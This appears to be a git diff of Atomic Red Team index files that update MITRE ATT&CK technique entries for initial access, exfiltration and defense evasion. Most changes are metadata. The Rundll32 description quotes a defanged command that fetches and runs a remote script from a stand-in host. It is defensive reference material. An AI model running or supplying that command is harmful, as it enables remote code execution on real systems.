-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -60311,7 +61214,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -60350,7 +61252,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -60365,7 +61267,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -60445,11 +61346,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60505,11 +61405,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -60570,8 +61469,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -60599,13 +61498,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60645,8 +61543,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60654,13 +61554,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60691,14 +61591,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60765,11 +61662,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60821,15 +61717,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60853,10 +61748,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60875,13 +61769,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60920,9 +61813,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -60972,7 +61864,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -60992,7 +61883,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -61012,8 +61903,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -61060,7 +61949,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -61080,7 +61968,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61102,8 +61990,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -61157,7 +62043,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -61182,7 +62067,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -61217,12 +62102,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61247,11 +62130,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -61294,9 +62176,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -61343,7 +62224,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -61369,7 +62249,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61402,13 +62282,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -61457,12 +62335,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -61498,12 +62375,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -61512,7 +62388,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -61536,9 +62411,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -61561,7 +62435,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61583,8 +62457,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -61635,7 +62507,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -61685,7 +62556,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -61710,7 +62580,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -61733,13 +62603,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61780,9 +62648,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61830,7 +62697,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61852,7 +62718,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61876,12 +62742,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61945,6 +62809,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/google-workspace-index.yaml b/atomics/Indexes/google-workspace-index.yaml
index 9c98e45763..13b3c58592 100644
--- a/atomics/Indexes/google-workspace-index.yaml
+++ b/atomics/Indexes/google-workspace-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
